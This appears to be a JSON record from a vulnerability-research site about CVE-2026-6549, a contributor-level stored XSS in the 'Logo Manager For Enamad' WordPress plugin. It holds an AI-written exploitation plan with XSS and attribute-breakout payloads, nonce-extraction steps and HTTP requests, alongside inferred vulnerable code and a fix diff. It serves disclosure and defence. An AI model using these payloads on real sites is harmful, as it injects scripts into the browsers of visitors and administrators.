[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHsU5wAfRJ8d2B-sMRfENNQJct6jqYyPh_Gdc9SgN6Ck":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-6549","logo-manager-for-enamad-authenticated-contributor-stored-cross-site-scripting-via-title-shortcode-attribute","Logo Manager For Enamad \u003C= 0.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute","The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","logo-manager-for-enamad",null,"\u003C=0.7.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-19 12:11:39","2026-05-20 01:25:57",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fed6d1167-c89d-4c97-9446-b968df945e6c?source=api-prod",[],"researched",false,3,"This research plan outlines the process for analyzing and exploiting **CVE-2026-6549**, a Stored Cross-Site Scripting (XSS) vulnerability in the \"Logo Manager For Enamad\" WordPress plugin.\n\n## 1. Vulnerability Summary\n*   **Vulnerability Name:** Logo Manager For Enamad \u003C= 0.7.4 - Authenticated (Contributor+) Stored XSS\n*   **Vulnerable Component:** Shortcode rendering logic for `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom`.\n*   **Vulnerable Attribute:** `title`\n*   **Cause:** The plugin fails to sanitize or escape the `title` attribute when generating the HTML output for these shortcodes. Since Contributors can create posts and use shortcodes, they can inject malicious scripts that execute in the context of any user viewing the post (including Administrators).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post Editor (`\u002Fwp-admin\u002Fpost.php` or `\u002Fwp-admin\u002Fpost-new.php`).\n*   **Attack Parameter:** The `title` attribute within a shortcode (e.g., `[vc_enamad_namad title=\"PAYLOAD\"]`).\n*   **Required Authentication:** Contributor-level account or higher.\n*   **Vulnerability Type:** Stored XSS.\n*   **Preconditions:** The plugin must be active, and the attacker must have permission to create or edit posts.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin (likely in `enamad-logo.php` or an included `shortcodes.php`) registers shortcodes via `add_shortcode('vc_enamad_namad', 'render_callback_function')`.\n2.  **Parsing:** When a post is rendered, WordPress calls `do_shortcode()`. The plugin's callback function receives an `$atts` array.\n3.  **Extraction:** The callback typically uses `shortcode_atts()` to extract the `title`.\n    *   *Predicted Code (inferred):* `$a = shortcode_atts( array( 'title' => '' ), $atts );`\n4.  **Sink:** The callback constructs an HTML string and returns it. The `title` value is concatenated without escaping.\n    *   *Predicted Sink (inferred):* `return '\u003Cdiv class=\"enamad-box\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>...\u003C\u002Fdiv>';`\n\n## 4. Nonce Acquisition Strategy\nTo exploit this via the standard WordPress UI (storing the XSS), the agent must obtain a post-editing nonce.\n\n1.  **Login:** Use the `http_request` tool to authenticate as a Contributor.\n2.  **Navigation:** Use `browser_navigate` to go to `wp-admin\u002Fpost-new.php`.\n3.  **Extraction:** Use `browser_eval` to retrieve the core WordPress nonce and the allocated post ID.\n    *   **Nonce Key:** `_wpnonce`\n    *   **JS Command:** `document.querySelector('#_wpnonce').value`\n    *   **Post ID JS:** `document.querySelector('#post_ID').value`\n\n## 5. Exploitation Strategy\nThe goal is to store the shortcode containing the payload and then verify its execution on the frontend.\n\n### Step 1: Store the Payload\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `[EXTRACTED_POST_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_title`: `Security Research - XSS`\n    *   `content`: `[vc_enamad_namad title='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `publish`: `Publish`\n\n### Step 2: Trigger the XSS\n*   **Action:** Navigate to the frontend URL of the newly created post (usually `http:\u002F\u002F[target]\u002F?p=[POST_ID]`).\n*   **Verification:** Check the page source for the unescaped payload.\n\n## 6. Test Data Setup\n1.  **Plugin:** Install and activate `logo-manager-for-enamad` version 0.7.4.\n2.  **User:** Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Page Creation (Optional):** If needed for testing, create a page containing the shortcode via CLI to verify the sink before automating the HTTP request.\n    *   `wp post create --post_type=post --post_status=publish --post_content=\"[vc_enamad_namad title='CanaryValue']\"`\n\n## 7. Expected Results\n*   The `POST` request to `post.php` should return a `302` redirect to the post editor with a success message.\n*   When the frontend post is fetched via `http_request`, the response body should contain the literal string: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   The JavaScript should execute in the browser context if viewed via `browser_navigate`.\n\n## 8. Verification Steps\n1.  **Verify Storage:** Use WP-CLI to confirm the payload is in the database.\n    *   `wp post get [POST_ID] --field=post_content`\n2.  **Verify Output:** Use `http_request` to fetch the frontend and check for the lack of encoding.\n    *   `response = http_request(\"GET\", \"http:\u002F\u002Ftarget\u002F?p=[POST_ID]\")`\n    *   Confirm `\"\u003Cscript>alert\"` exists and is NOT converted to `<script>`.\n\n## 9. Alternative Approaches\n*   **Shortcode Variations:** If `vc_enamad_namad` is sanitized in a specific version, test `vc_enamad_shamed` and `vc_enamad_custom`, as they likely share the same vulnerable rendering logic (inferred).\n*   **Attribute Breakout:** If the `title` is rendered inside an attribute (e.g., `\u003Cdiv title=\"[TITLE]\">`), use a breakout payload: `x\" onmouseover=\"alert(1)\" b=\"`.\n*   **REST API:** If the block editor is active, attempt to update the post via `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F[ID]` using a REST nonce (`window.wpApiSettings.nonce`).","The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute in its vc_enamad_namad, vc_enamad_shamed, and vc_enamad_custom shortcodes. This vulnerability allows authenticated users with Contributor-level access or higher to inject arbitrary web scripts into pages that execute when accessed by other users.","\u002F\u002F Inferred from plugin shortcode rendering logic\nfunction vc_enamad_namad_render($atts) {\n    $a = shortcode_atts( array(\n        'title' => '',\n    ), $atts );\n\n    \u002F\u002F Vulnerable Sink: the title attribute is concatenated without escaping\n    return '\u003Cdiv class=\"enamad-box\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>...\u003C\u002Fdiv>';\n}\nadd_shortcode('vc_enamad_namad', 'vc_enamad_namad_render');","--- a\u002Fenamad-logo.php\n+++ b\u002Fenamad-logo.php\n@@ -10,7 +10,7 @@\n     ), $atts );\n \n-    return '\u003Cdiv class=\"enamad-box\">\u003Ch3>' . $a['title'] . '\u003C\u002Fh3>...\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"enamad-box\">\u003Ch3>' . esc_html($a['title']) . '\u003C\u002Fh3>...\u003C\u002Fdiv>';","The exploit requires an authenticated user with at least Contributor-level permissions. The attacker navigates to the WordPress post editor and creates a new post or page. Within the content, the attacker inserts one of the vulnerable shortcodes (e.g., [vc_enamad_namad]) and sets the 'title' attribute to a malicious script payload, such as '>\u003Cscript>alert(document.domain)\u003C\u002Fscript>'. Once the post is saved or published, the script is stored in the database. When any user (including administrators) views the rendered post on the frontend, the unsanitized 'title' attribute is printed directly into the HTML, triggering the script execution in their browser context.","gemini-3-flash-preview","2026-05-20 16:48:41","2026-05-20 16:49:25",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flogo-manager-for-enamad\u002Ftags"]